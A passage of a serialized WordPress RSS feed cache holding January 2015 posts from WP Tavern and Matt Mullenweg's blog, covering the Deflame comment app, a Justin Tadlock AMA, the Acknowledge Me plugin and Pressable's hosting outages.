+0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:27;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"WPTavern: Deflame Web App Aims to Improve Discussion on WordPress Blogs\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37875\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"http://wptavern.com/deflame-web-app-aims-to-improve-discussion-on-wordpress-blogs\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4788:\"<p><span class=\"embed-youtube\"></span></p>\n<p>Life on the internet is full of controversial debates, people with strong opinions, and trolls, occasionally mixed in with intelligent, engaging conversation. You never know what you will encounter when you venture into the comments section on <a href=\"http://wptavern.com/why-comments-still-matter\" target=\"_blank\">blogs with open discussion enabled</a>, but that&#8217;s the beauty of free expression.</p>\n<p>The Tavern has always been a place where anyone is welcome to offer opinions in the comments, even if they&#8217;re not fully polished. Oftentimes this results in some quality interaction from community leaders. We use Jetpack comments, but the module is lacking in features that add a more interactive discussion experience between commenters.</p>\n<p><a href=\"http://defla.me/\" target=\"_blank\">Deflame</a> is a new web app, created by <a href=\"https://github.com/alexbecker\" target=\"_blank\">Alex Becker</a>, that aims to improve the quality of discourse on the internet. Both the standalone app and the Chrome extension were built to work with WordPress sites, since the platform currently dominates the web. Deflame offers three features that allow users to &#8220;ignore asshats,&#8221; delineate a side in debate, and share their perceptions of an argument with others via a unique URL.</p>\n<p>I tested the standalone version and the Chrome extension, using a recent WP Tavern <a href=\"http://wptavern.com/heropress-launches-kickstarter-campaign-to-highlight-wordpress-developers\" target=\"_blank\">post regarding HeroPress</a>, which sparked some heated debate. The app adds radio buttons to identify comment authors with whom you agree or disagree. You also have the option to ignore comments.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/deflama-example.png\" rel=\"prettyphoto[37875]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/deflama-example.png?resize=1025%2C1017\" alt=\"deflama-example\" class=\"aligncenter size-full wp-image-37889\" /></a></p>\n<p>It&#8217;s unclear why sometimes the comments receive two radio buttons, but it&#8217;s likely that the app cannot accurately anticipate the correct placement of the buttons due to differences in comment templates. Once you mark your opinions in the comments, clicking the Chrome extension button will present a summarized table at the top of the page. It includes a unique URL that allows you to share your view of the debate with the flames dampened.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/deflame-summary.jpg\" rel=\"prettyphoto[37875]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/deflame-summary.jpg?resize=755%2C235\" alt=\"deflame-summary\" class=\"aligncenter size-full wp-image-37910\" /></a></p>\n<p>Becker hopes that the app will give users a way to frame their positions and perceptions on debates that happen in the comments. &#8220;Too often, debates over important issues devolve into reasonable people on both sides attacking the trolls or madmen they perceive as representing the opposition,&#8221; he said. &#8220;Deflame aims to give commenters on WordPress-powered blogs the ability to rise above this.&#8221;</p>\n<p>Since the app doesn&#8217;t actually affect the website on which it&#8217;s being used, it offers an independent way of presenting a user-moderated discussion. Users can show an overview of their opinions, even when a site doesn&#8217;t offer interactive voting features for comments.</p>\n<p>However, some may not be comfortable with the fact that the app&#8217;s share link hides comments that have been ignored. The ability to view all comments is the only way to get the proper context for other comments posted in a debate. If visitors arrive to a site by clicking on a Deflame-generated link, they may not understand that they are only viewing a select group of comments. For this reason, I think an additional button to &#8220;show hidden comments&#8221; would be useful.</p>\n<p>Overall, <a href=\"http://defla.me/\" target=\"_blank\">Deflame</a> is an interesting idea that might make a useful WordPress plugin, if its code licensing permits. The project is available on <a href=\"https://github.com/alexbecker/deflame\" target=\"_blank\">GitHub</a>. It includes a small <a href=\"https://github.com/alexbecker/deflame/blob/master/supported.md\" target=\"_blank\">list of supported sites</a>, though the extension works reliably on many more that are not included in the list. If you want to test it, check out the <a href=\"http://defla.me/webapp.html\" target=\"_blank\">standalone  Deflame app</a> or install the <a href=\"https://chrome.google.com/webstore/detail/deflame/bfaljebllekeebnpajhkoambfhflhjfk\" target=\"_blank\">Chrome extension</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 26 Jan 2015 20:41:24 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:28;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"WPTavern: WP Chat Hosts AMA with Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37863\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"http://wptavern.com/wp-chat-hosts-ama-with-justin-tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3905:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2013/11/jt.jpeg\" rel=\"prettyphoto[37863]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2013/11/jt.jpeg?resize=150%2C150\" alt=\"jt\" class=\"alignright size-full wp-image-12052\" /></a></p>\n<p>WP Chat is currently hosting an AMA (&#8220;Ask Me Anything&#8221;) session with Justin Tadlock, founder of <a href=\"http://themehybrid.com/\" target=\"_blank\">Theme Hybrid</a> and co-author of <a href=\"http://www.amazon.com/Professional-WordPress-Plugin-Development-Williams/dp/0470916222/\" target=\"_blank\">Professional WordPress Plugin Development</a>. Tadlock recently <a href=\"http://wptavern.com/justin-tadlock-joins-forces-with-emil-uzelac-to-provide-wordpress-theme-review-as-a-service\" target=\"_blank\">joined forces with fellow WordPress.org Theme Review team member Emil Uzelac</a> to provide theme review as a service.</p>\n<p><a href=\"https://twitter.com/lelandf\" target=\"_blank\">Leland Fiegel</a>, founder of WP Chat, invited Tadlock as the first guest in <a href=\"https://wpchat.com/t/announcing-wpchat-amas-and-our-first-guest/571\" target=\"_blank\">a series of AMAs</a> with WordPress community members. If you&#8217;re new to the format, Fiegel recommends that you check out<a href=\"http://www.reddit.com/r/IAmA/comments/1jg781/i_am_matt_mullenweg_cofounder_of_wordpress_18_of/\" target=\"_blank\"> Matt Mullenweg&#8217;s AMA</a>, which was hosted on Reddit a year ago. Fiegel has a similar question-and-answer setup running Discourse, which is less ideal to navigate but gets the job done.</p>\n<p>Theme Hybrid is one of the oldest WordPress theme shops in business. As a long-time theme and plugin developer, Tadlock has witnessed WordPress trends over the years and has helped to shape theme development best practices. So far, a couple of the highlights from the AMA include:</p>\n<p><strong>Q: Advice for someone working full-time in an unrelated field trying to break into the WP business? I&#8217;ve been waking up at 5am for years to learn and practice WP dev but it sure seems slow going with the full-time job necessary to feed my family.</strong></p>\n<blockquote><p>Start a WordPress-related blog. Write tutorials. Share things that you learn. Learn things by writing about them. That&#8217;s how I got to know people in the community. It&#8217;s also how I was able to successfully launch Theme Hybrid.</p>\n<p>And, always reply to comments on your blog. You&#8217;ve got to interact with your readers. At a certain point, that gets tough, but keep the conversation going.</p></blockquote>\n<p><strong>Q: What is the worst thing about WordPress (the software) in your opinion? How can it be made better?</strong></p>\n<blockquote><p>From a pure user perspective, I&#8217;d like to see the admin simplified even more. Get rid of anything that&#8217;s not necessary. I&#8217;d drop the theme/plugin editors and tools screen for starters. Then, I&#8217;d work on figuring out how to simplify the post screen as much as possible.</p></blockquote>\n<p>Ever curious about the future of post formats, I asked Tadlock if he likes them and if he believes they have a future. He replied:</p>\n<blockquote><p>I love post formats. They&#8217;ve really been around for as long as I&#8217;ve been using WP (anyone remember <a href=\"http://ma.tt/2004/05/asides/\" target=\"_blank\">Matt&#8217;s asides</a>?). I think the initial build was put in too soon, so it&#8217;s created some problems for theme authors. I feel like I&#8217;ve overcome most of those issues with the post formats-related code in Hybrid Core.</p></blockquote>\n<p>If you&#8217;re a new or experienced theme developer, this is your chance to <a href=\"https://wpchat.com/t/i-am-justin-tadlock-ask-me-anything/600\" target=\"_blank\">ask Tadlock anything</a>. The WP Chat thread will be open for approximately 24-36 hours, if you have a question for Tadlock and want to join in.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 26 Jan 2015 17:55:39 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:29;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Matt: Build a CMS?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44627\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://ma.tt/2015/01/build-a-cms/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:224:\"<p>Austin Smith at Mediashift talks about <a href=\"http://www.pbs.org/mediashift/2015/01/why-its-risky-business-for-publishers-to-build-their-own-cms/\">Why It’s Risky Business for Publishers to Build Their Own CMS</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 26 Jan 2015 05:00:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:30;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:24:\"Matt: If Apple Made Milk\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44625\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"http://ma.tt/2015/01/if-apple-made-milk/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:297:\"<p><a href=\"http://www.adweek.com/adfreak/if-apple-made-milk-and-other-super-cool-imaginary-product-packaging-162398\">If Apple Made Milk, and Other Super-Cool Imaginary Product Packaging</a>, cool work by the artist <a href=\"http://www.peddymergui.com/\">Peddy Mergui</a>. (Who uses WordPress.)</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 24 Jan 2015 19:45:26 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:31;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"WPTavern: Acknowledge Me Plugin Outputs a GitHub Repository’s Contributors\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37834\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"http://wptavern.com/acknowledge-me-plugin-outputs-a-github-repositorys-contributors\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3202:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/pods-team.jpg\" rel=\"prettyphoto[37834]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/pods-team.jpg?resize=951%2C474\" alt=\"pods-team\" class=\"aligncenter size-full wp-image-37839\" /></a></p>\n<p>Open source projects often struggle with finding practical ways to recognize contributors. Although most contributors aren&#8217;t in it for the recognition, it&#8217;s nice for project leaders to have a way to showcase who is behind the work. The relative number of contributors on a project is often a good indicator of how many people are ultimately committed to its success.</p>\n<p><a href=\"https://wordpress.org/plugins/acknowledge-me/\" target=\"_blank\">Acknowledge Me</a> is a new plugin created by the folks behind the <a href=\"http://pods.io/\" target=\"_blank\">Pods Framework</a>. It makes it easy to output contributors for any GitHub repository onto a WordPress post, page, or PHP template.</p>\n<p>The plugin&#8217;s shortcode is configurable, so you can set the owner (the user name or organization name for the repo), the repo name, and optionally add a header and limit the number of contributors to display.</p>\n<p><code>[acknowledge_me owner=\"pods-framework\" repo=\"pods\" header_text=\"Pods Is Brought To You By:\" total=\"50\"]</code></p>\n<p>The output will generally look the same, no matter what theme you have activated. However, you may need to tweak some of the CSS in the event that the yellow mousover overlay doesn&#8217;t line up. When hovering over individual contributors, the plugin displays the number of contributions and links to the user&#8217;s GitHub profile.</p>\n<p>I tested the plugin with a sample repo and found that it works as advertised and also responds nicely to various screen sizes.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/contributors-screenshot.jpg\" rel=\"prettyphoto[37834]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/contributors-screenshot.jpg?resize=1025%2C616\" alt=\"contributors-screenshot\" class=\"aligncenter size-full wp-image-37838\" /></a></p>\n<p>If the layout looks familiar, that&#8217;s because the Acknowledge Me plugin is based on the <a href=\"https://github.com/Automattic/underscores.me/\" target=\"_blank\">Underscores.me website</a>, which showcases folks who have contributed to the starter theme. <a href=\"http://underscores.me/\" target=\"_blank\">Underscores.me</a> is essentially a live demo of what this plugin does.</p>\n<p>At the moment, you cannot show contributors for a specific version, as this isn&#8217;t something that the GitHub API supports in its responses for <a href=\"https://developer.github.com/v3/repos/#list-contributors\" target=\"_blank\">listing contributors</a>. The default output lists contributors to a specified repository, sorted by the number of commits per contributor in descending order.</p>\n<p>If you have a website dedicated to your project or you simply want to feature contributors in a blog post, the <a href=\"https://wordpress.org/plugins/acknowledge-me/\" target=\"_blank\">Acknowledge Me</a> plugin gives you an easy way to do that. You can install it via WordPress.org.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 23 Jan 2015 23:12:23 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:32;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"Matt: Find Fulfilling Work\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44615\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"http://ma.tt/2015/01/find-fulfilling-work/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:406:\"<p><span class=\"embed-youtube\"></span></p>\n<p><a href=\"http://alaindebotton.com/\">Alain de Botton</a> seems to be behind this fun series of videos that tries to apply philosophy to everyday life. This one I think is particularly important for founders, as I&#8217;ve seen many unhappy employees at startups because the founder was fundamentally unhappy because they were doing it for the wrong reasons.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 23 Jan 2015 21:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:33;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"WPTavern: Pressable Struggles to Retain Customers Following Recent Outages\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37786\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"http://wptavern.com/pressable-struggles-to-retain-customers-following-recent-outages\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:8174:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/pressable.jpg\" rel=\"prettyphoto[37786]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/pressable.jpg?resize=680%2C300\" alt=\"pressable\" class=\"aligncenter size-full wp-image-37814\" /></a></p>\n<p>Customers who have been following the <a href=\"http://status.pressable.com/2015/01/21/current-outage-breakdown-and-full-information/\" target=\"_blank\">Pressable Status blog</a> received no reassurance this week regarding the current outage. The <a href=\"https://pressable.com/about/\" target=\"_blank\">Pressable team</a> is currently working around the clock to resolve the issues causing customer websites to go down. The status blog states: &#8220;We do not currently have and will not likely provide an ETA in this situation. The best thing to do is to keep checking the current status at the bottom of this post.&#8221;</p>\n<p>The current outage comes on the heels of <a href=\"http://pressable.com/blog/2015/01/12/sorry-downtime/\" target=\"_blank\">last week&#8217;s outage</a>, for which CEO Vid Luther apologized on the company&#8217;s blog. Some customers reported 24+ hours of downtime. Pressable has been flooded with help desk requests, <a href=\"https://twitter.com/962nadia/status/558374329683935234\" target=\"_blank\">angry</a> <a href=\"https://twitter.com/DetailMyLife/status/558017979607420928\" target=\"_blank\">tweets</a>, and emails. For the past two weeks the company has been <a href=\"https://twitter.com/montidesign/status/558256236341501952\" target=\"_blank\">hemorrhaging</a> <a href=\"https://twitter.com/AlanPerlman/status/557946518809088000\" target=\"_blank\">customers</a> faster than it can repair the servers.</p>\n<h3>What&#8217;s Happening at Pressable?</h3>\n<p>Recent communications on the Pressable blog have left customers confused about the root of the incidents. The status <a href=\"http://status.pressable.com/2015/01/21/current-outage-breakdown-and-full-information/\" target=\"_blank\">post</a> cites a litany of compounding problems, i.e. issues with caching servers, internal bandwidth limitations on database servers, limitations on the rates at which servers can be added, an isolated cluster that was causing trouble for the others, etc.</p>\n<p>I spoke with Vid Luther to get a better understanding of what is happening behind the scenes at Pressable. From the outside, it appears that the company has a lack of infrastructure to accommodate the current customer load, but Luther said it&#8217;s much more than that:</p>\n<blockquote><p>The answer to this is complicated, it depends on your understanding of technology, business, and the WordPress eco-system. We are not lacking in terms of hardware or network capacity; we are short on the number of employees we have in comparison to the number of customers we have. Our entire team consists of 5 people, most people are usually amazed to learn about what we&#8217;ve accomplished as such a small team. But, when you have such a disparity in terms of employee to customer ratio, communication in a time of crisis like this suffers.</p></blockquote>\n<p>Over the past several weeks, the company has had all hands on deck to fix the problems, but customers have commented on the lack of transparency and Luther&#8217;s silence during the incidents.</p>\n<p>&#8220;I would like to apologize for not having a better communication strategy. Hopefully, others can learn from this, and plan for it accordingly,&#8221; Luther told the Tavern.</p>\n<p>&#8220;But, having a great communication plan doesn&#8217;t work for very long, eventually, you have to fix the problem for good,&#8221; he said. &#8220;That is what we&#8217;ve been working on. Over the past 12 months, we&#8217;ve had issues, and we&#8217;re tired of apologizing. I thought it would be best for us to deliver the solution instead of saying sorry once again.&#8221;</p>\n<h4>A Long-Standing Problem with Infrastructure</h4>\n<p>Customers have pointed out that while their websites have gone down, the Pressable site remains in tact. &#8220;This is because our website along with several thousand others, are already in our new infrastructure,&#8221; Luther explained.</p>\n<p>&#8220;The new infrastructure has much better underpinnings, not just from a raw horse power perspective, but it&#8217;s been designed with situations like this in mind. I would say it&#8217;s probably one of the more advanced configurations out in the WordPress hosting market.&#8221;</p>\n<p>In Luther&#8217;s <a href=\"http://pressable.com/blog/2015/01/12/sorry-downtime/\" target=\"_blank\">post</a> to the company blog regarding the previous outage, he mentions that the company anticipated this kind of problem last summer.</p>\n<blockquote><p>Fortunately, this is something that wasn’t completely unanticipated, we had identified this as a potential issue last summer, and had been working on upgrading our systems over the next two months.</p></blockquote>\n<p>What happened to halt the migration to the new infrastructure? Luther attributes it to an error in judgment.</p>\n<blockquote><p>The current situation is one of several scenarios we identified last summer, and then we ranked them in order of impact to customers, and probability of it actually happening. But, as you know Murphy&#8217;s law applies to all situations and people, and it applies here. We anticipated an event like this, and we designed a solution to address it, we were so busy building the new solution, we didn&#8217;t think about putting some safe guards on the old infrastructure.  This was an error in judgement. I am to blame for it.</p>\n<p>The root of the issue here is that our old infrastructure had a very large impact radius, and we didn&#8217;t migrate people fast enough after we had identified it. </p></blockquote>\n<p>Luther recognizes that the recent outages have had an impact on the business, as many customers are looking for alternative hosting solutions. He said that the team has ideas to help mitigate the losses once the situation is stable, but they aren&#8217;t ready to share those at this time.</p>\n<p>&#8220;First we want to make the current system stable again, then we&#8217;ll work with the affected customers and do what&#8217;s right by them,&#8221; he said.</p>\n<p>The five-person Pressable team is currently stretched thin and working overtime. Luther encourages customers to remember that there are human beings working tirelessly behind the servers and technology.</p>\n<blockquote><p>We&#8217;re exhausted, we&#8217;ve got pregnant wives, parents who&#8217;ve suffered multiple strokes, and some of us are still reeling from a divorce, we&#8217;re human, we&#8217;re juggling too many things at once, and we know we shouldn&#8217;t be, but we don&#8217;t know how to just stop.  The tweets, the comments, and general treatment by customers and competitors has been a brutal reminder of what it is to be a human. Could we have done things diferently? Absolutely.</p></blockquote>\n<p>The hosting business and the technology and infrastructure behind it are complex. Last year, WP Engine, a much larger company that received $15 million in funding in 2014, had to <a href=\"http://wptavern.com/wp-engine-addresses-critics-following-damaging-expose-of-its-customer-support\" target=\"_blank\">address critics following a damaging exposé of its customer support</a>. Eventually, every successful host will encounter the challenge of keeping pace with its own growth. Engineering customer happiness following unreliable service is an equally challenging endeavor.</p>\n<p>Pressable is cooking up strategies for regaining consumer confidence following the recent incidents, but the first order of business is to resolve the issues surrounding the current outage. This morning the company <a href=\"https://twitter.com/pressable/status/558660979517431808\" target=\"_blank\">opened up a room on its Hipchat account</a> to add another line of communication. For now, customers have no choice but to ride out the storm and watch the <a href=\"http://status.pressable.com/2015/01/21/current-outage-breakdown-and-full-information/\" target=\"_blank\">Pressable Status blog</a> for 